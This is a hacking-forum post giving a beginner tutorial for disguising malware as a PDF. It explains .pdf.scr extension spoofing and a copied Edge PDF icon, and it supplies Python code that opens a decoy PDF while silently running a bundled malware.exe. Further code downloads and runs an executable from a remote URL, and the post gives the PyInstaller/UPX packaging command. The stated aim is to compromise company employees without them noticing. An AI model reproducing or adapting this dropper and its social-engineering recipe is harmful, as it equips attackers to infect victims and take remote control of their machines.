Malware In a PDF file using Python. | General Hacking | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!

Malware In a PDF file using Python.

Malware In a PDF file using Python.

LV
1
 

0O1

Member
Joined
Nov 29, 2023
Threads
14
Likes
17
Awards
4
Credits
922©
Cash
0$
I created this tutorial because I remember when the YouTube channel LTT (LinusTech Tips) got hacked when an employee opened a fake PDF file, it's so strange how a guy supposed likes high techs and got some good computer science skills can just fall into this trap. Same for the hack of twitter in 2020 by a teenager, just a simple phishing. I understood at this moment that I underestimated the power of social engineering and that we can really hack big things with...

INTRO:

Ooohh, PDF and document. Maybe the best way to deliver malware : it's simple, every people can open, it's well known and used by all companies. Before we had some exploit working with specific PDF reader such as Adobe Acrobat reader for example CVE-2009-0658, all these exploit are now outdated so we had .doc macro that are now outdated too, and lately Follina RCE exploit (CVE-2022-30190) which can still be exploited since the patch is really new, and other exploits that get patched really fast. Even me, I searched many ways to deliver malware by a backdoor, a document, even a picture :pepeclap:. Nowadays without a good 0 day it's hard to get people with these old exploit but there is one thing that can't be outdated : Our brain. Yes, the social engineering. In this tutorial we won't use any exploit but make a simple but realistic pdf.scr.

PT1:

First of all what is a ".pdf.scr"? .scr is just the extension of Windows screensavers, it was basically for video and animation to be used as screensaver but it can work with any exe in fact. As for ".pdf", is just a part of the program name, only the last dot count. For example you can have "catgirls.txt.docx.pdf", this is obviously a pdf file, this stuff is called extension spoofing.
But you may ask what's the point? Well, Windows with normal settings hide known extension for example ".exe", so you can simply name a file catgirls.pdf.exe, but since Windows know exe it will hide this extension and only shows PDF :wat . But on mouse hover, you will realize that this is not a pdf file (but most of people don't know what a .scr file is). But that's the problem we are human, and not devices, this is social engineering. How to make this more realistic? We can simply put the PDF reader icon, and most of (stupid?) people will double click, and the malware will be exec. One of the problem is that we don't know the PDF reader that use the target, so we can't put the exact icon. For most of Windows 10 user they just keep the basic Microsoft Edge embed PDF reader, and for people who always use PDF with a specific reader and know well the icon this can be a problem....
Now I imagined a scenario when you deliver this kind of malware to a company, but you don't want them to know they got hacked (because indeed, for the moment the PDF seems not to open because there is only the malware, stupid one will think the PDF is broken other will realize that they got hacked). We can simply make that malware drop / open a real PDF file! That's exactly what we will do in the tutorial a pdf.scr file with PDF ico opening a real PDF.
So create your own test PDF, and let's get into it.

PT2:

Since this a tutorial is for newbie, and I want to keep it simple & friendly we will use Python.
First of all we will need the malware itself and I won't write one from scratch for this tutorial, even during my tests I didn't use a whole malware, just a simple C# reverse shell. Since we want it to be realistic.

Code: import os
import time
import sys
import subprocess
scriptpath = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__))) # Getting the script dir, because yes during the execution the script is the %temp% directory in a specific folder named "_MEIPASS+randomnumber"
malware = os.path.join(script_dir, 'malware.exe') # Your malware directory from the script dir defined above will show a code if you want to download it from internet, make sure you put the right name
pdf = os.path.join(script_dir, 'partnership2023.pdf') # Same for pdf make sure you put the right name
os.system(pdf) #We open PDF and will crash if there is an error
subprocess.Popen(malware, shell=True) #We exec the malware without stopping the flow of the program



This is a really basic implementation of the program if you want to make the program download and then exec you can just add these lines before the execution, easiest way is to use urllib:

Code: import urllib.request
malwareurl = "https://github.com/idk/malware.exe"
downloadpath = "Updater.exe"
urllib.request.urlretrieve(malwareurl, downloadpath) # no need comment urllib is simply magic


Now we have our simple working code, and we can now use py2exe or pyinstaller. I personally like auto-py-to-exe which is just a UI for Pyinstaller, there is every Pyinstaller option it's simple and fast :smart:. you can install it and run by :

Code: pip install auto-py-to-exe && auto-py-to-exe

Since it's with UI, I won't explain more how to pack in into an exe it's really simple you can even set any languages (see next part for "-i" arg)
But the most important thing is maybe --add-data, in the additional-file part you will put your malware exe and the PDF file with the exact name you set into the Python file (You will directly find these file in the "MEIPASS_" folder during the program execution).
Anyway, here is the Pyinstaller command I got:

Code: pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "partnership2023.pdf" --upx-dir "C:/Users/censored/censored/UPX/ --clean --add-data "C:/Users/censored/Desktop/project/PDF_skid/partnership2023.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_skid/malware.exe;." "C:/Users/censored/Desktop/project/PDF_skid/script.py"

Use UPX to make the final exe smaller, in a real life scenario I would make a C# program that download and exec the malware in less than 10 mb with + UPX:

Code: /p:EnableCompressionInSingleFile=true /p:PublishTrimmed=true

to make sure it's small as possible, keep in mind that python code is only for testing purpose

Pyinstaller give the option to choose the ico file, and we need THAT ONE PDF READER ICON, I didn't find the "Official Microsoft Edge PDF reader ico" on internet so I just give the one I extracted myself from edge app : https://gofile.io/d/ZNa0Xt
.ico can have multiple shapes depending the resolution for better optimization, this one do it perfectly
You may more understand by a picture:
[Image: resolution-changes.png]

As you can see at the left is a normal ico with a single res, the second one is the official one that increase the readability even with small resolution by making the writing "PDF" bigger.

Once you downloaded and add this ico path to your Pyinstaller command, you just click "CONVERT .PY TO .EXE" wait approx 2 min, open the output folder rename in .scr, and we done...

Now you might realize one issue, when we open the exe, if the PDF reader is Microsoft edge we clearly see the path of the PDF, a kinda suspicious path (MEIPASS_ folder) because we notice that it's not where we opened the PDF.
To avoid this, the idea would be to copy the PDF file into the actual exe dir, and make the exe hide itself and finally open the PDF, you want the code? Well I won't give and it still have some bug. It's your turn to figure it out!
Anyway we got a fake pdf (scr file) that open a real pdf, that's already nice! There is other way such as lnk file, which is kinda the same idea. Using this way you can in fact spoof any extensions and make open a real file, for example : .docx, .xls, txt, png & jpg the thing is that some program got icons that changed a lot during time like Microsoft Word and remember that you don't know what software use your target.
Keep in mind I put a lot of effort even in a basic tutorial like this so please comment and tell / ask / react.

Reply if there can be any Improvements :pepejuice:.
 
  • Like
Reactions: Gooodshot, skillissue and fognayerku

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Top Bottom